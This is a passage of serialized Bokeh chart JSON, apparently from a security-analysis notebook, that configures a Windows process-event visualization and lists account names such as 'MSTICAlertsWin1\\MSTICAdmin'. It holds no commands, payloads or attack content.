k\":null},\"id\":\"1026\",\"type\":\"TapTool\"},{\"attributes\":{\"editor\":{\"id\":\"1148\"},\"field\":\"ProcessId\",\"formatter\":{\"id\":\"1149\"},\"title\":\"ProcessId\"},\"id\":\"1126\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1150\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1151\"},\"title\":\"ParentProcessName\"},\"id\":\"1127\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1025\",\"type\":\"SaveTool\"},{\"attributes\":{\"editor\":{\"id\":\"1152\"},\"field\":\"TargetLogonId\",\"formatter\":{\"id\":\"1153\"},\"title\":\"TargetLogonId\"},\"id\":\"1128\",\"type\":\"TableColumn\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1130\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1024\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1044\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"text\":\"\"},\"id\":\"1134\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"1135\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1136\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1042\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"label\":{\"field\":\"SubjectUserName\"},\"renderers\":[{\"id\":\"1038\"}]},\"id\":\"1048\",\"type\":\"LegendItem\"},{\"attributes\":{},\"id\":\"1137\",\"type\":\"StringFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1039\",\"type\":\"CDSView\"},{\"attributes\":{\"items\":[{\"id\":\"1048\"}],\"title\":\"SubjectUserName\"},\"id\":\"1047\",\"type\":\"Legend\"},{\"attributes\":{},\"id\":\"1138\",\"type\":\"StringEditor\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\"},\"glyph\":{\"id\":\"1036\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1037\"},\"selection_glyph\":null,\"view\":{\"id\":\"1039\"}},\"id\":\"1038\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1139\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1140\",\"type\":\"StringEditor\"},{\"attributes\":{\"range\":{\"id\":\"1007\"},\"value\":0.1},\"id\":\"1049\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1141\",\"type\":\"StringFormatter\"},{\"attributes\":{\"range\":{\"id\":\"1009\"},\"value\":-0.2},\"id\":\"1050\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1142\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1143\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1144\",\"type\":\"StringEditor\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1055\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1145\",\"type\":\"StringFormatter\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1049\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1050\"}}},\"id\":\"1053\",\"type\":\"Text\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\"},\"glyph\":{\"id\":\"1052\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1053\"},\"selection_glyph\":null,\"view\":{\"id\":\"1055\"}},\"id\":\"1054\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1146\",\"type\":\"StringEditor\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1049\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1050\"}}},\"id\":\"1052\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"1147\",\"type\":\"StringFormatter\"},{\"attributes\":{\"range\":{\"id\":\"1007\"},\"value\":0.1},\"id\":\"1056\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1148\",\"type\":\"StringEditor\"},{\"attributes\":{\"range\":{\"id\":\"1009\"},\"value\":0.25},\"id\":\"1057\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1149\",\"type\":\"StringFormatter\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1111\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1091\"},{\"id\":\"1092\"},{\"id\":\"1093\"},{\"id\":\"1094\"},{\"id\":\"1095\"},{\"id\":\"1096\"},{\"id\":\"1111\"}]},\"id\":\"1098\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1150\",\"type\":\"StringEditor\"},{\"attributes\":{\"dimensions\":\"height\"},\"id\":\"1023\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1151\",\"type\":\"StringFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1062\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1152\",\"type\":\"StringEditor\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1056\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1057\"}}},\"id\":\"1060\",\"type\":\"Text\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\"},\"glyph\":{\"id\":\"1059\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1060\"},\"selection_glyph\":null,\"view\":{\"id\":\"1062\"}},\"id\":\"1061\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1153\",\"type\":\"StringFormatter\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"TimeGenerated\":\"datetime\"},\"renderers\":[{\"id\":\"1038\"}],\"tooltips\":[[\"Process\",\"@NewProcessName\"],[\"PID\",\"@PID\"],[\"CmdLine\",\"@CommandLine\"],[\"SubjUser\",\"@SubjectUserName\"],[\"SubjLgnId\",\"@SubjectLogonId\"],[\"TargLgnId\",\"@TargetLogonId\"],[\"Time\",\"@TimeGenerated{%F %T}\"]]},\"id\":\"1032\",\"type\":\"HoverTool\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1056\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1057\"}}},\"id\":\"1059\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"1160\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"data\":{\"Account\":[\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NT AUTHORITY\\\\LOCAL SERVICE\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NT AUTHORITY\\\\LOCAL 